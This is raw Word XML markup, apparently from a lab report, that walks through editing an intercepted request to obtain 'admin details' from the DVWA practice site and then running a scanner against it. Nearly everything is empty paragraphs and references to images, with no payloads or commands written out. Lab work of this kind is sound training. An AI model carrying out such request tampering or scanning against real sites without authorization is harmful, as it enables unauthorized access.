    <w:p w14:paraId="001DA02F" w14:textId="786E5120" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="00524139" w:rsidP="003D20B9">
      <w:r w:rsidRPr="000E6F01">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251691008" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="51A6668B" wp14:editId="72E51ED9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3147</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>33545</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4799441" cy="2344855"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="17780"/>
            <wp:wrapNone/>
            <wp:docPr id="119316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2330" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4799441" cy="23448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B96E7EB" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="374BE8BB" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="762C254A" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="169F70DC" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="7DB96DD4" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="7B5E50F6" w14:textId="77777777" w:rsidR="003E1D51" w:rsidRDefault="003E1D51" w:rsidP="003D20B9"/>
    <w:p w14:paraId="129ABB3C" w14:textId="77777777" w:rsidR="003E1D51" w:rsidRDefault="003E1D51" w:rsidP="003D20B9"/>
    <w:p w14:paraId="0937532C" w14:textId="77777777" w:rsidR="003E1D51" w:rsidRDefault="003E1D51" w:rsidP="003D20B9"/>
    <w:p w14:paraId="4EBDB8C4" w14:textId="77777777" w:rsidR="003E1D51" w:rsidRDefault="003E1D51" w:rsidP="003D20B9"/>
    <w:p w14:paraId="68893199" w14:textId="77777777" w:rsidR="003E1D51" w:rsidRDefault="003E1D51" w:rsidP="003D20B9"/>
    <w:p w14:paraId="36BDD48A" w14:textId="77777777" w:rsidR="003E1D51" w:rsidRPr="000E6F01" w:rsidRDefault="003E1D51" w:rsidP="003D20B9"/>
    <w:p w14:paraId="4DB749E9" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="0B9B5F11" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="629AC679" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="66BCEBBE" w14:textId="47C85805" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000E6F01">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251692032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="07C18287" wp14:editId="5DF23671">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3147</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>322580</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5276519" cy="3057100"/>
            <wp:effectExtent l="19050" t="19050" r="19685" b="10160"/>
            <wp:wrapNone/>
            <wp:docPr id="20645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4895" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5276519" cy="30571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0E6F01">
        <w:t>Edit the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ACC56A" w14:textId="67B938E3" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="171E7B35" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="076951EF" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="6E7901B5" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="33436C53" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="3C9F7176" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="4BD09661" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="1C25F144" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="76A57200" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="441361F6" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="36A1ECDD" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="7D08B399" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="51DEE234" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="6E98B4D6" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="735E6EAC" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="08C8C349" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="18F8724E" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="2365BDB5" w14:textId="77777777" w:rsidR="00CA03E3" w:rsidRDefault="00CA03E3" w:rsidP="003D20B9"/>
    <w:p w14:paraId="4E775C04" w14:textId="77777777" w:rsidR="00CA03E3" w:rsidRDefault="00CA03E3" w:rsidP="003D20B9"/>
    <w:p w14:paraId="4D8A8817" w14:textId="77777777" w:rsidR="00CA03E3" w:rsidRDefault="00CA03E3" w:rsidP="003D20B9"/>
    <w:p w14:paraId="7A71FF79" w14:textId="77777777" w:rsidR="00CA03E3" w:rsidRDefault="00CA03E3" w:rsidP="003D20B9"/>
    <w:p w14:paraId="20389E68" w14:textId="77777777" w:rsidR="00CA03E3" w:rsidRDefault="00CA03E3" w:rsidP="003D20B9"/>
    <w:p w14:paraId="22BD7A9C" w14:textId="77777777" w:rsidR="00CA03E3" w:rsidRDefault="00CA03E3" w:rsidP="003D20B9"/>
    <w:p w14:paraId="05386C3C" w14:textId="77777777" w:rsidR="00CA03E3" w:rsidRDefault="00CA03E3" w:rsidP="003D20B9"/>
    <w:p w14:paraId="7F9224BC" w14:textId="77777777" w:rsidR="00CA03E3" w:rsidRDefault="00CA03E3" w:rsidP="003D20B9"/>
    <w:p w14:paraId="010EB351" w14:textId="77777777" w:rsidR="00CA03E3" w:rsidRPr="000E6F01" w:rsidRDefault="00CA03E3" w:rsidP="003D20B9"/>
    <w:p w14:paraId="0E45E950" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="2B1466C6" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000E6F01">
        <w:lastRenderedPageBreak/>
        <w:t>Record the response.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> We got the admin details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B7830F" w14:textId="7AAE3421" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="001F42A3" w:rsidP="003D20B9">
      <w:r w:rsidRPr="000E6F01">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251693056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="49DE98CD" wp14:editId="1656A608">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>33546</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3262944" cy="3749868"/>
            <wp:effectExtent l="19050" t="19050" r="13970" b="22225"/>
            <wp:wrapNone/>
            <wp:docPr id="36987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78900" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3262944" cy="374986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32BBB14" w14:textId="7D31CDB9" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="7FB4C5EE" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="551A293B" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="67AC9A51" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="63A9061E" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="665C8DEE" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="07BDC5EC" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="165E95C6" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="45A498C2" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="56851D6C" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="4BC694FF" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="234D8292" w14:textId="77777777" w:rsidR="001F42A3" w:rsidRDefault="001F42A3" w:rsidP="003D20B9"/>
    <w:p w14:paraId="0C6B56DB" w14:textId="77777777" w:rsidR="001F42A3" w:rsidRDefault="001F42A3" w:rsidP="003D20B9"/>
    <w:p w14:paraId="6422CD10" w14:textId="77777777" w:rsidR="001F42A3" w:rsidRDefault="001F42A3" w:rsidP="003D20B9"/>
    <w:p w14:paraId="78032156" w14:textId="77777777" w:rsidR="001F42A3" w:rsidRDefault="001F42A3" w:rsidP="003D20B9"/>
    <w:p w14:paraId="7151A674" w14:textId="77777777" w:rsidR="001F42A3" w:rsidRDefault="001F42A3" w:rsidP="003D20B9"/>
    <w:p w14:paraId="134D46A7" w14:textId="0CA48C6C" w:rsidR="001F42A3" w:rsidRDefault="001F42A3" w:rsidP="003D20B9"/>
    <w:p w14:paraId="7EEB0E8D" w14:textId="0DBD72FD" w:rsidR="001F42A3" w:rsidRDefault="001F42A3" w:rsidP="003D20B9"/>
    <w:p w14:paraId="28530D86" w14:textId="6E005521" w:rsidR="001F42A3" w:rsidRDefault="001F42A3" w:rsidP="003D20B9"/>
    <w:p w14:paraId="02653718" w14:textId="6A2B3435" w:rsidR="001F42A3" w:rsidRDefault="001F42A3" w:rsidP="003D20B9"/>
    <w:p w14:paraId="7D2A940E" w14:textId="77777777" w:rsidR="001F42A3" w:rsidRPr="000E6F01" w:rsidRDefault="001F42A3" w:rsidP="003D20B9"/>
    <w:p w14:paraId="1C4ECF88" w14:textId="73B178F9" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="001F42A3" w:rsidP="003D20B9">
      <w:r w:rsidRPr="000E6F01">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251694080" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F5133D7" wp14:editId="7A7AF099">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>33269</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4400160" cy="2957885"/>
            <wp:effectExtent l="19050" t="19050" r="19685" b="13970"/>
            <wp:wrapNone/>
            <wp:docPr id="50288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83123" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4400160" cy="29578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67C6688" w14:textId="78B84856" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="3D7625E1" w14:textId="31E9DC34" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="78980499" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="7AF555F1" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="30EF0233" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="5C343DE9" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="5B37F640" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="0CEED097" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="40C4F471" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="5EE266BE" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="2E8C831B" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="5F8E74DA" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="7725CB6C" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="38D1A858" w14:textId="77777777" w:rsidR="003605C1" w:rsidRDefault="003605C1" w:rsidP="003D20B9"/>
    <w:p w14:paraId="1324594E" w14:textId="77777777" w:rsidR="003605C1" w:rsidRDefault="003605C1" w:rsidP="003D20B9"/>
    <w:p w14:paraId="590C71CC" w14:textId="77777777" w:rsidR="003605C1" w:rsidRDefault="003605C1" w:rsidP="003D20B9"/>
    <w:p w14:paraId="583B2F38" w14:textId="77777777" w:rsidR="003605C1" w:rsidRDefault="003605C1" w:rsidP="003D20B9"/>
    <w:p w14:paraId="24ED69EF" w14:textId="77777777" w:rsidR="003605C1" w:rsidRDefault="003605C1" w:rsidP="003D20B9"/>
    <w:p w14:paraId="4E789B66" w14:textId="77777777" w:rsidR="003605C1" w:rsidRDefault="003605C1" w:rsidP="003D20B9"/>
    <w:p w14:paraId="7FF9F494" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="3328C5D5" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="3E3A3DCB" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="006947CB" w:rsidRDefault="003D20B9" w:rsidP="006947CB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc224128481"/>
      <w:r w:rsidRPr="006947CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Scanning the DVWA website for alerts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="5B615E2D" w14:textId="4BADC9A6" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="00407988" w:rsidP="003D20B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000E6F01">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251695104" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4F05EA09" wp14:editId="20FAAFB1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>272084</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5515058" cy="1663945"/>
            <wp:effectExtent l="19050" t="19050" r="9525" b="12700"/>
            <wp:wrapNone/>
            <wp:docPr id="187289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93065" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5515058" cy="166394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3D20B9" w:rsidRPr="000E6F01">
        <w:t>Enter the target website to scan and click ‘Attack’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4166BE7D" w14:textId="210804D3" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="1DA68898" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="18D2F820" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="7085B359" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="543E415C" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="735E5324" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="10FC1C6D" w14:textId="77777777" w:rsidR="003E08DB" w:rsidRDefault="003E08DB" w:rsidP="003D20B9"/>
    <w:p w14:paraId="1F75E13B" w14:textId="77777777" w:rsidR="003E08DB" w:rsidRDefault="003E08DB" w:rsidP="003D20B9"/>
    <w:p w14:paraId="406E2D31" w14:textId="77777777" w:rsidR="003E08DB" w:rsidRDefault="003E08DB" w:rsidP="003D20B9"/>
    <w:p w14:paraId="7324F41B" w14:textId="77777777" w:rsidR="003E08DB" w:rsidRPr="000E6F01" w:rsidRDefault="003E08DB" w:rsidP="003D20B9"/>
    <w:p w14:paraId="04A87B6D" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="4E93B513" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000E6F01">
        <w:t>Below are the alerts for the DVWA website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139687C0" w14:textId="7393A7CE" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="001804B1" w:rsidP="003D20B9">
      <w:r w:rsidRPr="000E6F01">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251696128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0DC45BB9" wp14:editId="50BEA2EE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>17726</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5629523" cy="2924826"/>
            <wp:effectExtent l="0" t="0" r="9525" b="8890"/>
            <wp:wrapNone/>
            <wp:docPr id="187871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13356" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5629523" cy="2924826"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E28F2B" w14:textId="74441983" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="5E9B23DC" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="00BB9474" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="373ADE56" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="68706BEC" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="3BE92A81" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="7B1074AC" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="4158D435" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="07D1DA7C" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="18B789BC" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="542BBE19" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="2D28A5E4" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="0B70E962" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="05B60802" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
